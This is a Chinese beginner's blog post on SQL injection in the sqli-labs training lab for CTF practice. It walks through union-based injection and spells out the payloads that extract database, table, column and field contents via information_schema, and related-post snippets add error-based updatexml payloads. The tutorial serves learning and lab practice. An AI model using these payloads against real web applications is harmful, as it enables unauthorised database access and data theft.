数据库查询(菜鸡所写)

最新推荐文章于 2024-03-14 10:36:16 发布
原创 最新推荐文章于 2024-03-14 10:36:16 发布 · 232 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #web #ctf

一、准备

环境:phpstudy2018
题目:sqli-labs-master

二、sql注入

主要分为数字型和字符型

语法:

select * from table
查询 table 中 所有字段内容 :
在这里插入图片描述
select * from table where xxxxxxx
where是限制语,限制返回的内容是符合限制条件的

在这里插入图片描述
database() 返回当前使用的数据库
# 为注释符
limit 1,2 限制返回一行
group_concat() 返回在一行内,该字段或表下的所有内容

原因:

一般来说,每个 Mysql 中都含有一个名为 information_schema的数据库,这个库是系统用来记录其他数据库的信息,在这个数据库中里面有个 tables 表 和 columns表;

tables表是用来提供数据库中表的详细信息,表来自哪个数据库,其中有一行字段名为table_schema,是用来匹配为表的数据库;
columns表是用来记录各个字段名及其表,其中有个字段名为table_name,是用来匹配字段来自的表。

为啥要这么麻烦的查找字段名和表名,直接找那个需要的flag不好吗?这样想是没毛病的,但是你有没有想过,没有字段名,你咋查,用啥查。
所以我们就要利用information_schema中记录的数据库信息,来查找对应的字段,要查找字段名就得知道对应的表名,要知道表名就又得知道数据库名,这就要用到database()。
在查询过程中,这里就可能有一些阻碍,例如没有返回,这就要用到盲注;有报错信息的返回,就用报错注入,当然也可以用其他的方法;。。。。。。。

注入的基本步骤(可能有升级版):

1、探查注入的类型。(盲注啥的特殊的,不适合下列方法)
构造?id=1 and 1=2 (可能参数不是id),如果返回成功,很大可能是字符型;如果是返回失败,可能为数字型;再进一步的构造payload?id=1 and 1=1,如果成功的话,很大的可能就是数字型;如果失败的话,基本就是字符型,这里就要构造闭合;特别注意:可能存在过滤,导致查询失败;

2、然后就是寻找寻找注入点
如果是字符型,先闭合;如果是数字型,就可以直接 ?id=1 order by 1#,查看返回是否正常,不正常时,就把order by后面的1逐步向上加,直到异常,最后一次正常的,就是有几列。再然后就是利用?id=-1 union select 1,2,3# ,1,2,3就是你探测的长度,查看返回的是几,然后几就是注入点。

3、基本操作(假如2是注入点)
一、
?id=-1 union select 1,database(),3# 返回对应的数据库
然后利用数据库名在information_schema数据库中查询信息
二、

?id=-1 union select 1,group_concat(table_name),3 from information_schmea.tables where table_schema='当下的数据库名(可以用database()来替代)'#

三、

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='想要查询的表'#

四、

?id=-1 union select 1,group_concat(字段名),3 from 表名#

4、其他,就用别的sql函数就行了,百度,(不停的做题)(注意利用脚本来写,快)

https://blog.youkuaiyun.com/weixin_41516710/article/details/90740752

5、工具

可以用sqlmap的,就用sqlmap
burpsuite也行

CTF bugku 成绩查询】关于sql注入
zw05011的博客
01-17 732
知识点 sql注入基础原理(超详细) - 简书一、Sql注入简介 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最...https://www.jianshu.com/p/078df7a35671通过1和1'查看返回值,确定注入 通过1' order by 1#、1' order by 2#直到确定为几列 通过联合查询 1' union select database(),user()#进行查询
数据库查询(group by和order by)
weixin_44591067的博客
01-21 7107
写在前面 我是一个应届生,最近和朋友们维护了一个公众号,内容是我们在从应届生过渡到开发这一路所踩过的坑,以及我们一步步学习的记录,如果感兴趣的朋友可以关注一下,一同加油~ 正文 作为一名入坑没多久的“码农”,操作数据库恐怕是入职最先接触到的内容,因此我的第一篇文章便是SQL。一篇很基础基础的文章,算是查缺补漏。 PS:我就是一个…希望各位看官轻喷。 一、增删改查的基本操作 1.1、查询中的子...
数据库SQL)代码编写——数据查询(学习笔记)
m0_67466364的博客
08-29 1281
eg.查询计算机系(cs)、数学系(ma)和信息系(is)学生的姓名和性别。语法:[not] like’<匹配串>’ [escape’<换码字符>']eg.查询计算机系(cs)、数学系(ma)和信息系(is)eg.查询名字中第二个字为“阳”的学生的姓名和学号。20~30岁之间的学生的姓名、系别和年龄。(in谓词其实是多个or运算符的缩写)eg.查询年龄在20~30岁()之间的学生的姓名、系别和年龄。(2)查询满足条件的元组。(3)查询经过计算的值。(1)消除取值重复的行。的学生的姓名和性别。
SQL 查询语句
Davis
03-08 3258
文章目录1、简单查询2、去除单列的重复结果查询3、去除多列的重复结果查询4、限制查询结果条数5、对查询结果排序(1)按照单个列的值进行排序(2)按照多个列的值进行排序6、带搜索条件查询(1)简单搜索条件查询(2)匹配列表中的元素查询(3)匹配NULL值查询(4)多个搜索条件查询(a)AND 操作符(b)OR 操作符(c)通配符(d)转义通配符7、表达式和函数查询(1)表达式(2)函数(a)文本处理函数(b)日期和时间处理函数(c)数值处理函数(d)聚集函数(ⅰ)count函数(ⅱ)max函数(ⅲ)min函数
CTFHUB SQL
qq_49422880的博客
07-24 616
前言:SQL注入知识点繁多,最近开始学SQL注入,把之前没做的SQL系列学习一遍 标题一:SQL 报错注入 1.查询数据库名:-1 union select updatexml(1, concat(0x7e, database(),0x7e),1) 2.查询表名:-1 union select updatexml(1,concat("~",(select group_concat(table_name) from information_schema.tables where table_s..
CTF学习笔记——SQL注入
xuanyulevel6的博客
08-25 6302
以pikachu靶场练习来学习ctf知识
data1.sql 数据库文件 配合阮的MySQL教程使用
01-23
这个在SQLyog里面执行完以后,可以配合教程 数据库学习之MySQL (三)——操作数据库 小试牛刀 表 是什么 使用,enjoy your coding.
数据库中文查询对偶学习式生成SQL语句研究.pdf
最新发布
05-27
偶学习的方式在少量训练数据集上进行弱监督学习,将中文查询生成 SQL 语 句。该文同时使用两个任务来训练 自然语言转化到SQL,再从SQL转化到自然语言,让模型学习到任务之间的对偶约束性,获取更多相关的...
如何使用达梦数据库、Doris数据库查询上述问题?
05-26
使用达梦数据库查询上述问题可以按照以下步骤进行: 1. 创建数据库和表:首先需要创建一个数据库和相关的表,可以使用达梦数据库管理工具DMExpress或者命令行工具dmdddl来完成。 2. 插入数据:插入一些测试数据到...
数据库原理课件
12-17
10. **数据库性能优化**:包括查询优化、索引设计、存储优化、查询重构和数据库调优等。了解如何读取执行计划,使用EXPLAIN分析查询性能,以及调整数据库参数都是提升性能的关键。 11. **分布式数据库**:随着...
二、sql注入(CTF技巧)
黑日里不灭的light
03-14 1389
解释:在一些题目里面常常充满了各种各样的过滤,我们需要结合实际情况去进行注入,下面提供一些Payload以及适用场景。
web实现数据库以及数据查看和简单操作
洋葱专栏-有灵魂的程序员
07-28 5136
1、对应的jsp <%@page import=”cn.edu.hpu.usermanager.service.ManagerImpls”%> <%@ page language=”java” import=”java.util.,cn.edu.hpu.usermanager.model.,cn.edu.hpu.usermanager.service.ManagerImpls.*” pageEn
CTF-练习平台 writeup web
heySister
12-20 2万+
bugku Web WriteUp 刚刚接触ctf没多久,做ctf-练习平台上的题目,有些新的题目,在网上没有找到对应的writeup,所以做了之后就想自己写一个,也顺便理理自己的思路。(没有太多经验…可能对有些题目的理解还不深刻…) 签到题 加群在公告里就可以看到flag值了。 Web2 F12,立马就看到flag的值了。 文件上传测试 题目说是...
CGCTF-Web-SQL Injection(查询语句制定注入策略、PHP stripslashes()和htmlentities())
Sea_Sand息禅
03-21 1024
代码如下: <?php #GOAL: login as admin,then get the flag; error_reporting(0); require 'db.inc.php'; function clean($str){ if(get_magic_quotes_gpc()){ $str=stripslashes($str); } return htmlentiti...
网页上直接sql查询操作数据库,并在网页上展示列表数据的工具页面
热门推荐
yule117737767的专栏
10-13 4万+
很多人可能跟我一样,需要连接N都个数据库,进行操作, 有时候要查某个服务器下某个数据库的某张表的数据. 然后只能打开连接远程服务器, 连接远程数据库, 然后再sql语句操作. 每次都很烦,所以有空做了个 连接数据库操作的工具页面. 直接工具栏输入, 下面显示查询结果列表 前端: easyui 前端我用的是easyui的表格功能,这个做列表数据展示还不错, 后端: php 接口,  ...
SQL常见查询写法
憨态可掬的博客
11-01 722
SQL的常见写法老实忘记,这次单独整理一下查询的写法,主要是分页,怕自己又忘记分页的写法,每次都去百度太麻烦,就记录下来吧
ctf web基本步骤
小小白的博客
06-27 3万+
大家做ctf简单点的都可以用这些判断,基本上都会有,除非个别变态的。 1. 看源码 可以右键->【查看网页源代码】,也可以用火狐和谷歌浏览器的按F12键,按F12键可以修改html源代码方便构造一些值提交,但如果不需要的话直接右键查看源代码更直观,看网页里面的注释之类的都很方便。 2. 抓包 这几天接触到的抓包一般是用burpsuite,如果要多次尝试可以右键->【send t...
CTF--MySQL数据库
woshisz0413的博客
11-27 1110
MySQL: (1)MySQL查询:union(连接多个select)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值